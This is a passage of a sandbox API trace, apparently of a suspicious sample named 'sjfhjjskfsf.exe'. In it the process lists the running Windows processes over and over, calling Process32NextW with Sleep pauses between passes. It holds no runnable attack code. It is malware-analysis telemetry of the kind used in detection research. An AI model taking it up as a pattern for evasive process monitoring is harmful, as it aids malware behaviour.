lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.674] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.674] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.675] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.675] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.675] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.676] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.676] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.676] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.676] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.677] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.677] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.677] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.677] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.678] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.678] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.678] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.679] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.679] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.679] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.680] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.680] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.680] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.680] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.681] Sleep (dwMilliseconds=0x64) [0223.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x274 [0223.785] Process32FirstW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.785] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.785] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.786] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.786] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.786] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.787] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.787] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.787] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.787] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.788] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.788] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.788] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.789] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.789] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.789] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.789] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.790] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.790] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.790] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.791] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.791] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.791] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.791] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.792] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.792] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.792] Process32NextW (in: hSnapshot=0x274, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.793] Sleep (dwMilliseconds=0x64) [0223.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x278 [0223.897] Process32FirstW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.897] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.897] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.898] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.898] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.898] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.898] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.899] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.899] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.899] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.900] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.900] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.900] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.900] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.901] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.901] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.901] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.902] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.902] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.902] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.902] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.903] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.903] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.903] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.904] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.904] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.904] Process32NextW (in: hSnapshot=0x278, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.904] Sleep (dwMilliseconds=0x64) [0223.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x27c [0224.001] Process32FirstW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.001] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.002] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.002] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.002] Process32NextW (in: hSnapshot=0x27c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 